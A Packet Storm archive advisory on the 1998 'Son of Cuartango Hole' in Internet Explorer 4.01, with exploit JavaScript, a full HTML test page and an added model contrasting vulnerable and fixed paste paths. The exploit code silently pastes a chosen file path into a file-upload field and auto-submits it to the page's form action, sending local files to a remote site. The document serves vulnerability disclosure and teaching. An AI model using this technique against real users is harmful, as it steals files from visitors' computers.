cuartango-son.txt

Reported by Packet Storm, 17 Aug 1999 (type: packetstorm; source: packetstormsecurity.com)

Cuartango Hole exploits untrusted scripted paste in Internet Explorer; fix available from Microsoft.

Code
The Son of Cuartango Hole

http://pages.whowhere.com/computers/cuartangojc/son1.html

Affected software
Microsoft Internet Explorer 4.01

Fixes
Microsoft has released a fix: Microsoft Security Site
http://www.microsoft.com/security/bulletins/ms98-015.asp
Microsoft names the vulnerability "Untrusted Scripted Paste".
They have created a new USP patch.
  
Technical description

There is an input form field used to transfer files from the browsing computer to a web site. This
input field is HTML coded as:

```html
<input type="file" name="filename" size="30">
```

Theoretically this input field can be filled only by the user, by clicking the "Browse" button or
typing the file name. In order to avoid a security hole, scripts are not allowed to modify the value
of this input field, so the statement below will not work:

```javascript
document.forms[0].filename = "C:\config.sys";
```

The Cuartango Hole revealed that a single scripted "copy and paste" operation could write a file
name into the input field; Microsoft's old USP patch fixed this single "copy and paste"
vulnerability.
There is a workaround that makes the "paste" operation work again. The idea is: create a "textrange"
object from the selection of the file input and then paste over this "textrange" object.
  
The code below is a bit more sophisticated than the "Cuartango Hole" code:

T1 is a hidden input field defined in a second form containing the file pathname to be copied to
the clipboard.

```html
<body onload="getfile()">

<script language="JavaScript">
function getfile()
{
document.forms[1].T1.select();              // select the hidden T1 field holding the path
document.execCommand("copy");               // copy it to the clipboard
document.forms[0].filename.select();        // select the file input
var rng = document.selection.createRange(); // TextRange over that selection
rng.execCommand("paste");                   // paste into the range instead of the document
document.forms[0].submit();                 // POST the file to the form's action URL
}
</script>
```

The result is that the file is POSTed to the malicious web site defined in the form's action
property.
Similar code will also work inside an HTML-formatted e-mail.
  
The Cuartango Hole code was very similar:

```javascript
function getfile()
{
document.forms[1].T1.select();
document.execCommand("copy");
document.forms[0].filename.select();
document.execCommand("paste");   // document-level paste, the path closed by the old USP patch
document.forms[0].submit();
}
```
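The two snippets above differ only in which object receives the "paste" command, which is the whole point of the advisory: the original patch blocked one mutation path into the file input while another path still wrote to it. The following model is an added example, not code from the advisory or from any browser; it is a hypothetical stand-in for a file input that applies the rule browsers use today (script may only clear the field, any non-empty value must come from a user action) and contrasts a "paste" path that bypasses that check with one routed through it. The names FileInput, Clipboard, pasteVulnerable, pasteFixed and runScenario, and the sample path "/test.txt", are constructed for the example; the final check mirrors the advisory's own test page, which treats a non-empty file name after a scripted paste as proof of the hole.

```javascript
// Added model, not browser or advisory code. The vulnerable paste path
// mirrors the shape of the Cuartango-era bug: a second way of mutating the
// field that never consulted the trust check applied to script assignment.

class InvalidStateError extends Error {
  constructor(msg) { super(msg); this.name = "InvalidStateError"; }
}

class FileInput {
  constructor() { this._path = ""; }

  get value() { return this._path; }

  // Mutation attributed to the user (clicking "Browse", typing a path).
  setFromUser(path) { this._path = path; }

  // Mutation attributed to script: clearing is allowed, nothing else.
  setFromScript(path) {
    if (path !== "") {
      throw new InvalidStateError("file input value cannot be set by script");
    }
    this._path = "";
  }
}

// Clipboard stand-in. In the advisory it is filled by execCommand("copy") on a
// hidden field the page controls, so its content is attacker-chosen.
class Clipboard {
  constructor() { this.text = ""; }
  copy(text) { this.text = text; }
}

// Vulnerable command path (hypothetical model of the old behaviour): a paste
// initiated by script writes the field's storage directly, skipping the check.
function pasteVulnerable(input, clipboard) {
  input._path = clipboard.text;
  return input.value;
}

// Fixed path: a paste triggered from script is script-driven input, so it is
// routed through the same check as a direct assignment and is refused.
function pasteFixed(input, clipboard) {
  input.setFromScript(clipboard.text);
  return input.value;
}

// Same detection the advisory's test page performs: after the scripted paste,
// a non-empty file name means the protection was bypassed.
function runScenario(pasteFn) {
  const uploadForm = { filename: new FileInput() };  // forms[0] in the advisory
  const clipboard = new Clipboard();
  clipboard.copy("/test.txt");                        // constructed sample path (the hidden T1 value)
  try {
    pasteFn(uploadForm.filename, clipboard);
  } catch (e) {
    if (!(e instanceof InvalidStateError)) throw e;   // only the expected refusal is swallowed
  }
  return {
    exposed: uploadForm.filename.value !== "",
    value: uploadForm.filename.value,
  };
}

console.log("vulnerable path:", runScenario(pasteVulnerable));
console.log("fixed path:", runScenario(pasteFixed));
```

The design point the model makes is that the check belongs on the field's single mutation boundary, classified by who initiated the change, not on each command that happens to reach it; a second command path (here, a range-scoped paste) otherwise reopens exactly the hole the first fix closed.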
  
  
  
Example Exploit

```html
<html>

<head>
<meta name="keywords"
content="son of cuartango hole,cuartango hole,cuartango hack,cuartango,security,security site,USP,USP patch,security web,hack,security,risk,hole,security hole,explorer">
<title>Son of Cuartango Hole Test</title>
<bgsound src="images/gallarda.mid" loop="-1">
</head>

<body onload="getfile()">
<script language="JavaScript">

function getfile()
{
document.forms[0].filename.select(); // onload="getfile()"
var rng = document.selection.createRange();
document.forms[1].T1.select();
document.execCommand("copy");
rng.execCommand("paste");
if(document.forms[0].filename.value == "")
alert("Your browser does not have the security hole");
else
alert("Security hole in browser -- " + navigator.userAgent );
}

</script>

<p align="center"><big><font color="#FF0000"><big><big>The Son of Cuartango Hole Test</big></big></font></big></p>

<p align="center">&nbsp;</p>
<small>

<form enctype="multipart/form-data" method="post"
action="http://www.angelfire.com/cgi-bin/bedit">
<div align="center"><center><p><strong>This is a test to verify if you are affected by the
Son of Cuartango Hole</strong>.<br>
<strong>If file name (/test.txt) is made visible in the box below then you are affected.</strong></p>
</center></div><div align="center"><center><p>&nbsp;<input type="file" name="filename"
size="15"></p>
</center></div>
</form>

<form method="POST">
<input type="hidden" name="T1" value="/test.txt"><p>&nbsp;</p>
</form>
</small>

<p align="center"><font size="3" color="#0000FF"><a
href="http://pages.whowhere.com/computers/cuartangojc/son1.html"><strong>Back to Son Of
Cuartango Hole page</strong></a></font></p>

<p align="center">&nbsp;&nbsp;&nbsp; <a href="mailto:[email protected]">Juan
Carlos García Cuartango</a></p>

<p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br>
</small></font></p>

<p><font size="2" face="Garamond">Last update&nbsp;1998&nbsp; Nov 15 Año del Señor de
1998 </font></p>
</body>
</html>
```
